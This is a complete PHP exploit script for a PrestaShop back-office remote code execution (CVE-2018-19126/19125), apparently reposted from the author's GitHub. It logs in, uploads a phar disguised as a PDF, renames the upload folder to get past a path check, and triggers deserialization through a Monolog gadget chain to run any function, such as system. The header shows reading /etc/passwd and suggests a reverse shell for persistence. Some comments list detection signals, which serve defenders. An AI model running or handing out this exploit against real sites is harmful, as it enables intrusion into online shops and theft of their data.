PrestaShop 1.6.x / 1.7.x Remote Code Execution
来源:https://github.com/farisv 作者:farisv 发布时间:2018-12-12  
<?php
/**
 * 
 * PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x <= 1.7.4.4 - Back Office Remote Code Execution
 * See https://github.com/farisv/PrestaShop-CVE-2018-19126 for explanation.
 * 
 * Chaining multiple vulnerabilities to trigger deserialization via phar.
 *
 * Date:
 *   December 1st, 2018
 *
 * Author:
 *   farisv
 *
 * Vendor Homepage:
 *   https://www.prestashop.com/
 *
 * Vulnerable Package Link:
 *   https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip
 *
 * CVE :
 *   - CVE-2018-19126
 *   - CVE-2018-19125
 * 
 * Prerequisite:
 *   - PrestaShop 1.6.x before 1.6.1.23 or 1.7.x before 1.7.4.4.
 *   - Back Office account (logistician, translator, salesman, etc.).
 * 
 * Usage:
 *   php exploit.php back-office-url email password func param
 * 
 * Example:
 *   php exploit.php http://127.0.0.1/admin-dev/ salesman@shop.com 54l35m4n123
 *   system 'cat /etc/passwd'
 * 
 * Note:
 * Note that the upload directory will be renamed and you can't upload the
 * malicious phar file again if the folder name is not reverted. You might want
 * to execute reverse shell to gain persistence RCE or include the command to
 * rename the folder again in your payload (you need to know the path to the
 * upload directory).
 * 
 * FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.
 * THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.
 * 
 */

namespace PrestaShopRCE {

    /**
     * Driver for the proof-of-concept chain described in the file header.
     *
     * Every step is an HTTP POST against the Back Office base URL given on
     * the command line, performed with a logged-in Back Office session, so
     * the whole chain is authenticated: the low-privilege accounts named
     * under "Prerequisite" above (and the file-manager access they carry) are
     * the first thing to audit on an exposed installation. The version
     * ranges in the header give the fixed releases.
     */
    class Exploit {
        private $url;
        private $email;
        private $passwd;
        private $cmd;      // declared but never written or read in this file
        private $func;
        private $param;

        /**
         * @param string $url    Back Office base URL; paths given to post()
         *                       are appended to it verbatim.
         * @param string $email  Back Office login.
         * @param string $passwd Back Office password.
         * @param string $func   Name of the PHP function the gadget chain
         *                       is meant to call on the target (e.g. system,
         *                       per the Usage block in the header).
         * @param string $param  Single argument handed to $func.
         */
        public function __construct($url, $email, $passwd, $func, $param) {
            $this->url = $url;
            $this->email = $email;
            $this->passwd = $passwd;
            $this->func = $func;
            $this->param = $param;
        }

        /**
         * Sends one POST request to $this->url . $path and returns the raw
         * response with headers included (CURLOPT_HEADER is on), so callers
         * can read Set-Cookie lines out of it.
         *
         * @param string       $path   Appended to the base URL with no
         *                             separator handling; with the trailing
         *                             slash shown in the Usage example the
         *                             request path presumably starts with
         *                             "//", which is visible in access logs.
         * @param array|string $data   Passed straight to CURLOPT_POSTFIELDS;
         *                             an array holding a \CurlFile is sent
         *                             as a multipart upload.
         * @param string       $cookie Raw Cookie header value ("" for none).
         * @return string|false Response text, or false when curl_exec()
         *                      fails; the failure is not checked here and
         *                      flows into fetch_cookie() unchanged.
         */
        private function post($path, $data, $cookie) {
            $curl_handle = curl_init();
            
            $options = array(
                CURLOPT_URL => $this->url . $path,
                CURLOPT_HEADER => true,
                CURLOPT_POST => 1,
                CURLOPT_POSTFIELDS => $data,
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_COOKIE => $cookie
            );
            
            curl_setopt_array($curl_handle, $options);
            $raw = curl_exec($curl_handle);
            curl_close($curl_handle);

            return $raw;
        }

        /**
         * Returns the value of the first "Set-Cookie:" header in a raw
         * response: everything after the header name up to the first ';'.
         *
         * Edge cases, as written: when no Set-Cookie header is present,
         * strpos() yields false, which the addition treats as 0, so the slice
         * starts 12 bytes into the response instead of failing; when the
         * value has no ';' the second strpos() is false as well and substr()
         * returns an empty string. Neither case is reported to the caller.
         *
         * @param string|false $raw Full response as returned by post().
         * @return string Cookie "name=value" pair, or the garbage above.
         */
        private function fetch_cookie($raw) {
            $header = "Set-Cookie: ";
            $cookie_header_start = strpos($raw, $header);
            $sliced_part = substr($raw, $cookie_header_start + strlen($header));
            $cookie = substr($sliced_part, 0, strpos($sliced_part, ';'));
            return $cookie;
        }

        /**
         * Executes the chain end to end and prints the final raw response.
         *
         * Steps, each one a POST through post():
         *   1. Log in to the Back Office and keep its session cookie.
         *   2. Open the bundled file manager to obtain its own cookie.
         *   3. Build the gadget object from the stub classes defined later in
         *      this file, store it as Phar metadata in a local phar.phar, and
         *      rename the file to phar.pdf so it passes as a document upload.
         *   4. Upload it through filemanager/upload.php.
         *   5. Rename the upload folder so the file manager's realpath()
         *      check no longer rejects the path used in step 6.
         *   6. Ask ajax_calls.php for the image size of a phar:// path. PHP's
         *      phar stream wrapper (on the PHP versions of the era) reads the
         *      archive metadata and unserializes it; per the phpggc reference
         *      below the resulting Monolog objects presumably end up calling
         *      $this->func($this->param) during destruction.
         *
         * Defender's notes:
         *   - Observable artefacts: an application/pdf upload whose body is a
         *     PHP phar stub, a rename_folder call on the upload directory,
         *     and a request to ajax_calls.php?action=image_size whose path
         *     begins with "phar://". Any of these in access logs deserves an
         *     alert, and the renamed folder (see Note in the header) is a
         *     lasting trace on disk.
         *   - None of the intermediate responses is inspected ($raw from the
         *     upload and rename steps is overwritten unread), so a failed
         *     step only shows up in the final output.
         *   - phar.pdf is left behind in the current working directory.
         */
        public function run() {

            // Login and get PrestaShop cookie
            $data = array(
                'email' => $this->email,
                'passwd' => $this->passwd,
                'submitLogin' => '1',
                'controller' => 'AdminLogin',
                'ajax' => '1'
            );
            $cookie = "";   // no session yet
            $raw = $this->post('/', $data, $cookie);
            $prestashop_cookie = $this->fetch_cookie($raw);

            // Get FileManager cookie (the file manager keeps its own session)
            $data = array();
            $cookie = $prestashop_cookie;
            $raw = $this->post('/filemanager/dialog.php', $data, $cookie);
            $filemanager_cookie = $this->fetch_cookie($raw);

            // Craft deserialization gadget
            // processors = ['current', func], buffer record = [param, ...];
            // see the stub classes and the phpggc reference below.
            $gadget = new \Monolog\Handler\SyslogUdpHandler(
                new \Monolog\Handler\BufferHandler(
                    ['current', $this->func],
                    [$this->param, 'level' => null]
                )
            );

            // Craft malicious phar file
            // The archive content is irrelevant; only the metadata matters,
            // because that is what the phar wrapper unserializes.
            $phar = new \Phar('phar.phar');
            $phar->startBuffering();
            $phar->addFromString('test', 'test');
            $phar->setStub('<?php __HALT_COMPILER(); ? >');
            $phar->setMetadata($gadget);
            $phar->stopBuffering();

            // Change the extension
            // The phar wrapper does not care about the extension; the upload
            // filter does, which is why the file is presented as a PDF.
            rename('phar.phar', 'phar.pdf');

            // Cookie for next requests
            $cookie = "$prestashop_cookie; $filemanager_cookie";

            // Upload phar.pdf
            $curl_file = new \CurlFile('phar.pdf', 'application/pdf', 'phar.pdf');
            $data = array(
                'file' => $curl_file
            );
            $raw = $this->post('/filemanager/upload.php', $data, $cookie);

            // Rename image directory to bypass realpath() check
            // (response is not checked; see the docblock)
            $data = array(
                'name' => 'renamed'
            );
            $raw = $this->post(
                '/filemanager/execute.php?action=rename_folder',
                $data,
                $cookie
            );

            // Trigger deserialization
            // The '/img/cms/' substring is important to bypass string check
            // The "phar://" prefix in this parameter is the clearest
            // detection signal for this chain.
            $data = array(
                'path' => 'phar://../../img/renamed/phar.pdf/img/cms/'
            );
            $raw = $this->post(
                '/filemanager/ajax_calls.php?action=image_size',
                $data,
                $cookie
            );

            // Display the raw result
            print $raw;

        }
    }

}

/*
 * Based on
 * https://github.com/ambionics/phpggc/blob/master/gadgetchains/Monolog/RCE/1/
*/
namespace Monolog\Handler {

    /**
     * Minimal stand-in for Monolog's SyslogUdpHandler. Only the $socket
     * property is needed: it carries the BufferHandler built in
     * Exploit::run(). The property name and its protected visibility decide
     * how the object is serialized into the phar metadata, which is why the
     * stub mirrors the real class's layout (per the phpggc reference above)
     * rather than its behaviour; on the target the real Monolog class is
     * presumably what gets instantiated from that serialized form.
     */
    class SyslogUdpHandler {
        protected $socket;

        /**
         * @param object $param The BufferHandler gadget to wrap.
         */
        function __construct($param) {
            $this->socket = $param;
        }
    }

    /**
     * Minimal stand-in for Monolog's BufferHandler, carrying only the
     * properties the gadget chain relies on (see the phpggc reference
     * above). Property order, names and visibility are kept as declared:
     * PHP serializes properties in declaration order, so changing any of
     * them changes the serialized form written into the phar metadata.
     */
    class BufferHandler {
        protected $handler;
        protected $bufferSize = -1;
        protected $buffer;
        protected $level = null;
        protected $initialized = true;
        protected $bufferLimit = -1;
        protected $processors;

        /**
         * @param array $methods Callables stored in $processors
         *                       (['current', <func>] from Exploit::run()).
         * @param array $command Single record placed in $buffer.
         */
        function __construct($methods, $command) {
            $this->processors = $methods;
            $this->buffer = [$command];
            // Clone only after the two assignments above, so the nested
            // handler carries the same processors and buffer.
            $this->handler = clone $this;
        }
    }

}

namespace {

    // Command-line front end: validates the argument count, checks that the
    // curl extension is present, and hands the five positional arguments to
    // PrestaShopRCE\Exploit. All real work happens in Exploit::run().
    if (count($argv) !== 6) {
        $hint = "Usage:\n  php $argv[0] back-office-url email password func param\n\n"
            . "Example:\n  php $argv[0] http://127.0.0.1/admin-dev/ "
            . "salesman@shop.com 54l35m4n123 system 'uname -a'";
        die($hint);
    }

    // cURL is the only transport Exploit::post() knows how to use.
    if (!extension_loaded('curl')) {
        die('Need php-curl');
    }

    // Positional arguments; $argv[0] (the script name) is skipped.
    [, $url, $email, $passwd, $func, $param] = $argv;

    $exploit = new PrestaShopRCE\Exploit($url, $email, $passwd, $func, $param);
    $exploit->run();

}
            


 